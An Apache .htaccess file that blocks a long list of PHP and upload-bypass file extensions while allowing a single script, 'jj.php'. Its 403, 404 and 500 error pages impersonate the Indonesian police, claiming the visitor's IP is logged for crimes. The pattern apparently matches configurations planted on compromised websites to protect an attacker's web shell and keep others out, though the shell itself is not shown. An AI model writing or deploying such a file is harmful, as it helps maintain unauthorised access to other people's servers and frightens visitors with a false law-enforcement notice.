Options -Indexes
<FilesMatch ".(php|Php|pHp|phP|Php.asp|php.anu|php.fla|PHP|php3|php2|Php1|pht|phar|anu|fla|asp|aspx|php.jpg|php6|php7|php8|php9|phtml|shtml|php.aspx|php;.jpg|php.fla|php.phar|fLa|flA|FLa|fLA|FlA|FLA|phtMl|phtmL|PHtml|PhTml|PHTML|PHTml|PHTMl|PhtMl|PHTml|PHtML|pHTMl|PhTML|pHTML|PhtmL|PHTmL|PhtMl|PhtmL|pHtMl|PhTmL|pHtmL|aspx|ASPX|asp|ASP|php.jpg|PHP.JPG|php.xxxjpg|PHP.XXXJPG|php.jpeg|PHP.JPG|PHP.JPEG|PHP.PJEPG|php.pjpeg|php.fla|PHP.FLA|php.png|PHP.PNG|php.gif|PHP.GIF|php.test|php;.jpg|PHP JPG|PHP;.JPG|php;.jpeg|php jpg|php.bak|php.pdf|php.xxxpdf|php.xxxpng|fla|Fla|fLa|fLa|flA|FLa|fLA|FLA|FlA|php.xxxgif|php.xxxpjpeg|php.xxxjpeg|php3.xxxjpeg|php3.xxxjpg|php5.xxxjpg|php3.pjpeg|php5.pjpeg|shtml|php.unknown|php.doc|php.docx|php.pdf|php.ppdf|jpg.PhP|php.txt|php.xxxtxt|PHP.TXT|PHP.XXXTXT|php.xlsx|php.zip|php.xxxzip|shtMl|shtmL|SHtml|ShTml|SHTML|SHTml|SHTMl|ShtMl|SHTml|SHtML|sHTMl|ShTML|sHTML|ShtmL|SHTmL|ShtMl|ShtmL|sHtMl|ShTmL|sHtmL|Shtml|sHtml|shTml|sHTml|zip|shtml)$">

 Order allow,deny
 Deny from all
</FilesMatch>

<FilesMatch "^(jj.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
ErrorDocument 403 '<center><img src="https://polri.go.id/webpolri/assets/img/others/logo-polri.png"></img> <h3>Sistem Sudah Mencatat Alamat IP Kamu dan Kami akan menindaklanjuti Tindakan illegal yang Anda lakukan.</h3><font>"Kami mendeteksi adanya tindak kejahatan yang Anda lakukan, Tindakan ini telah diatur oleh Pasal 30 ayat 1, ayat 2, dan atau ayat 3 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE) dan Pasal 32 ayat 1 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE)."</font><font color=black><br> Alamat IP : <font color=red>%{REMOTE_ADDR}</font><font color=black> <br> User-Agent : <font color=red>%{HTTP_USER_AGENT}</font>'
ErrorDocument 404 '<center><img src="https://polri.go.id/webpolri/assets/img/others/logo-polri.png"></img> <h3>Sistem Sudah Mencatat Alamat IP Kamu dan Kami akan menindaklanjuti Tindakan illegal yang Anda lakukan.</h3><font>"Kami mendeteksi adanya tindak kejahatan yang Anda lakukan, Tindakan ini telah diatur oleh Pasal 30 ayat 1, ayat 2, dan atau ayat 3 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE) dan Pasal 32 ayat 1 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE)."</font><font color=black><br> Alamat IP : <font color=red>%{REMOTE_ADDR}</font><font color=black> <br> User-Agent : <font color=red>%{HTTP_USER_AGENT}</font>'
ErrorDocument 500 '<center><img src="https://polri.go.id/webpolri/assets/img/others/logo-polri.png"></img> <h3>Sistem Sudah Mencatat Alamat IP Kamu dan Kami akan menindaklanjuti Tindakan illegal yang Anda lakukan.</h3><font>"Kami mendeteksi adanya tindak kejahatan yang Anda lakukan, Tindakan ini telah diatur oleh Pasal 30 ayat 1, ayat 2, dan atau ayat 3 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE) dan Pasal 32 ayat 1 UU No 11/2008 tentang Informasi dan Transaksi Elektronik (ITE)."</font><font color=black><br> Alamat IP : <font color=red>%{REMOTE_ADDR}</font><font color=black> <br> User-Agent : <font color=red>%{HTTP_USER_AGENT}</font>'
